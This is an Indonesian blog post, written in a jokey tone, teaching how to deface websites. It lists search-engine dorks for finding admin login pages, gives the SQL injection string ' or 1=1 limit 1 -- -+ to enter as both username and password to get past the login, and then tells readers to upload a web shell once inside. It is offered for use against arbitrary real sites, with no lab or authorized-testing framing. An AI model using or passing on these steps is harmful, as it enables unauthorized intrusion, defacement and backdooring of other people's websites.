Breaking

Selasa, 09 April 2019

Deface bypass SQL login

Halo agan agan gans sekalian :D. Balik lagi dengan ku admin gans tampan idaman :P hari ini admin gans tampan idaman akan memberikan tutorial deface lagi wkwkwk yaitu deface dengan metode bypass SQL login. Ini gk beda beda amat Ama bypass admin sih tapi cuma beda query aja jajaja langsung aja simak gays.

~ dorking menggunakan dork
inurl:/admin/login.php
inurl:/adminpanel/
inurl:/admin-panel/
Sisanya racik sendiri yakan h3h3
~ jika sudah pilih target dengan dork diatas kalian akan disuruh login admin dulu yakan login dengan
Username: ' or 1=1 limit 1 -- -+
Password: ' or 1=1 limit 1 -- -+
Langsung aja sih kita login keun hwhwhw
Jika vuln maka nanti akan diarahkan ke dashboard adminnya seperti ini
Kalau sudah gitu gimana? Ya cari tempat upload lalu upload shell jagoan kalian lah>:( sekian terimakasih hwhw


Tidak ada komentar:

Posting Komentar